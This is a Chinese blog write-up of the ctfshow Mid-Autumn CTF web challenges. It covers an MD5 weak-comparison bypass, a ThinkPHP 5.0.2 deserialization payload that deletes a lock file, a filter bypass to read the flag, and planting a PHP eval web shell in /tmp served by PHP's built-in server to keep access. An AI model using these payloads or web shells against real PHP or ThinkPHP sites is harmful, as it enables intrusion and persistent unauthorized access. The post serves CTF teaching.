ctfshow—月饼杯(第二届)web wp

最新推荐文章于 2024-05-28 15:56:26 发布
最新推荐文章于 2024-05-28 15:56:26 发布
阅读量658 收藏
点赞数 2
分类专栏: 刷题记录 文章标签: php thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/121304346
版权

web签到

<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
    if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
        echo "小伙子不错嘛!!flag给你了:" . $flag;
    } else {
        echo "偶吼,带黑阔被窝抓到了!!!!";
    }
}

$a==md5($a)

0e215962017 的 MD5 值也是由 0e 开头,在 PHP 弱类型比较中相等

eztp

<?php
namespace app\index\controller;
class Index
{   
    public function index($run=[])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);

    if (!empty($run[2])){
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
    if (!empty($run[1])){
            unserialize($run[1]);
        }
    }
    // hint:/index/index/backdoor
    public function backdoor(){
        if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
        echo "Try to post CMD arguments".'<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
        $cmd='cat '.$cmd;
        echo $cmd;
                system($cmd);
            }else{
                echo "No No No";
            }

        }else{
        echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
    }
    }
}

通过backdoor得到flag,但需要先删除install.lock

根据报错信息,Thinkphp版本为5.0.2

可以利用Thinkphp5.1任意文件删除漏洞

<?php
namespace think\process\pipes;
use think\Process;
class Pipes{}
class Windows extends Pipes{
	private $files = [];
	function __construct(){
		$this->files = ["/var/www/html/application/index/controller/../../install.lock"];
	}
}
echo urlencode(serialize(New Windows()))."\n";
?>

传参数

/index.php/index/index/?run[1]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F..%2F..%2Finstall.lock%22%3B%7D%7D

成功删除后访问/index.php/index/index/backdoor

POST

cmd=/fl%99ag

image-20211113134404722

不要离开我

<?php

// 题目说明:
// 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在

error_reporting(0);
highlight_file(__FILE__);

$a=$_GET['action'];

switch($a){
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}

内置Web Server

CLI SAPI 提供了一个内置的Web服务器。

这个内置的Web服务器主要用于本地开发使用,不可用于线上产品环境。

URI请求会被发送到PHP所在的的工作目录(Working Directory)进行处理,除非你使用了-t参数来自定义不同的目录。

如果请求未指定执行哪个PHP文件,则默认执行目录内的index.php 或者 index.html。如果这两个文件都不存在,服务器会返回404错误。

当你在命令行启动这个Web Server时,如果指定了一个PHP文件,则这个文件会作为一个“路由”脚本,意味着每次请求都会先执行这个脚本。如果这个脚本返回 false ,那么直接返回请求的文件(例如请求静态文件不作任何处理)。否则会把输出返回到浏览器。

php -S 开启内置服务器   -t 指定目录

payload:

http://xxxxx/?action=cmd
POST
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST[a]);?>");system ("sleep 5 && php -S 0.0.0.0:80 -t /tmp/");

在可写的/tmp目录下传木马并写系统命令,然后提交5秒内进⾏check,check会关闭nginx和php-fpm,由于是www-data权限,⽆法启动nginx和php-fpm,直接启动php内置服务器即可。

参考链接:
https://lewiserii.github.io/2021/09/21/ctfshow-WP/CTFshow-%E6%9C%88%E9%A5%BC%E6%9D%AF(%E7%AC%AC%E4%BA%8C%E5%B1%8A)-%E9%83%A8%E5%88%86wp/

Snakin_ya
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow 2021月饼-web
Yasso的博客
10-22 644
web签到(md5弱类型) <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "偶吼
中秋月饼中秋月饼中秋月饼
01-30
中秋月饼
Ctfshow web入门 权限维持web670-web679 详细题解 全
Jay17的博客
08-20 777
Ctfshow web入门 权限维持web670-web679 详细题解 全
64位下php环境安装教程,PHP环境安装
weixin_39670627的博客
03-20 1221
#:-:一、windows环境安装>[info]使用PHP需要先安装环境,以前安装环境比较麻烦,需要安装Apache、PHP应用服务器、MySQL管理系统。现在都有集成包(phpStudy、Xampp、宝塔面板、wdcp面板),很方便。我们在`Windows`上操作,所以教程以`phpStudy`为例,[官网地址](https://www.xp.cn)*安装步骤*第一步:下...
ctfshow web 月饼II
2301_81040377的博客
05-28 565
但是前面提到了会进行转义,这里是使用了一个%99,解码是个中文可以绕过。这道题命令执行很简单,但是没有生成flag,我们要先生成flag才可以。版本为5.0.2我们可以利用5.1的文件删除漏洞。check之后光速退出,就可以看到这个页面。,然后我们就可以进行反序列化然后进行传参。还有一个base64解码看看。我愿意称为MVP结算页面。
ctfshow 月饼 web部分wp
weixin_74427106的博客
12-08 54
1.打开网页就一个wrong password,下载附件,很明显是一个反序列化,在看到str_replace()这个函数很明显就是字符串逃逸了,这个是字符串增多的逃逸。先看第一层,第一层我想了好久,其实没有想到,我开始也就想到用e相关的科学计数法进行绕过,但想不到用那种方法,这里看了看别的师傅的wp,才知道有下面的知识点。这里的意思就是a自己次方在161和323这个范围内,而它的平方就超过这个范围,所以第一层就绕过了。用bp爆破一下发现%被过滤了,而_是没有过滤的,那就利用脚本进行爆破。
2021ctfshow月饼web
weixin_47813861的博客
09-22 1238
随便写写,欢迎师傅的意见与批评 eztp <?php namespace app\index\controller; class Index { public function index($run=[]) { highlight_file(__FILE__); echo '<h1>Welcome to CTFSHOW</h1></br>'; echo 'Powered by PHPthink5.
月饼销售方案月饼销售方案.doc
07-05
月饼销售方案】 本方案详述了一家公司在中秋期间针对月饼销售制定的策略,旨在提高销量,提升品牌形象,以及激发员工积极性。以下是方案的核心内容: 1. **产品介绍与定价**: - 提供四种不同价位的月饼礼盒,...
中秋月饼的选择flash动画
07-31
标题中的“中秋月饼的选择flash动画”表明这是一份与中秋节相关的多媒体内容,主要形式为Flash动画。Flash是一种曾经广泛用于创建交互式网页元素、动画和游戏的软件平台。在这个特定的案例中,它被用来制作一个展示...
基于Java实现的接月饼小游戏课程设计
最新发布
06-28
【作品名称】:基于Java实现的接月饼小游戏【课程设计】 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:基于Java实现...
小游戏-吃月饼源码
03-19
中秋节是中国传统节日,吃月饼是其重要的文化习俗,因此这款游戏可能融入了中秋元素,玩家在游戏中扮演角色吃月饼,体验节日氛围,同时带来娱乐。 【源码】指的是程序的原始代码,它是开发者用编程语言编写的指令...
php-5.2.5-x64(php 64位)
05-11
php-5.2.5-x64(php 64位),64位的PHP不太好找,分享给大家。
现在PHP开发比较难找到的php5.2的 64位版本,官方都是5.6的,包括win7在内的都可以用
01-03
现在PHP开发比较难找到的php5.2的 64位版本,官方都是5.6的,包括win7在内的都可以用
PHP5.4 64位
04-09
php-5.4.0-nts-Win32-VC9-x64 专为windows sever 8 windows 8 7 优化的64位原生PHP。CPU也优化了。
PHP-5.5.15 VC11 64位
08-06
解压即可,解压后将php.ini-development重命名为php.ini,并修改其中的配置 1. ;extension_dir="/ext"修改为 extension_dir="解压的目录/php/ext" 2. ;extension=php_mysql.dll 修改为 extension=php_mysql.dll 其余用到的工具按需把“;”去掉即可使用
CTFshow月饼第二届) 中秋快乐 部分wp
Nancy523的博客
09-21 2370
苟,都可以苟 只要我osint做的够快我就不会被刷掉.jpg 体验很好,下次还来( 目录 1、web web签到 直接贴脚本吧,web不太懂不解释 <?php $str="0e"; for($i=1;$i<=10000000000;$i++){ $md5 = $str.$i; if (hash("md5",$md5)==$md5){ echo $md5; break; ..
ctfshow web月饼
读书 买花 长大
01-05 304
月饼
Web】CTFSHOW 月饼 题解(全)
uuzeray的博客
05-10 709
是一个非负整数,表示提取子字符串的起始位置。[ ] 表示指定范围 ([a-f]) 或集合 ([abcdef]) 中的任何单个字符。[^] 不属于指定范围 ([a-f]) 或集合 ([abcdef]) 的任何单个字符。一眼八股,但小写字母都被waf掉了,用提示中的环境变量+linux字符串截取来构造。脚本爆可以0e绕过的值,$b要爆3位,$c要爆4位。中提取一个子字符串,并根据提供的参数进行操作。变量中的第3、第4和第5个字符组成的子字符串。是一个非负整数,表示提取的子字符串的长度。同于DOS命令中的?
月饼词云python
09-16
2. 读取包含月饼数据的文件,并将其加载到一个pandas的DataFrame中。 3. 对数据进行必要的清洗和处理,例如去除重复项、空值或异常值。 4. 提取月饼的关键词信息,可以使用分词工具(如jieba)进行中文分词。 5. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值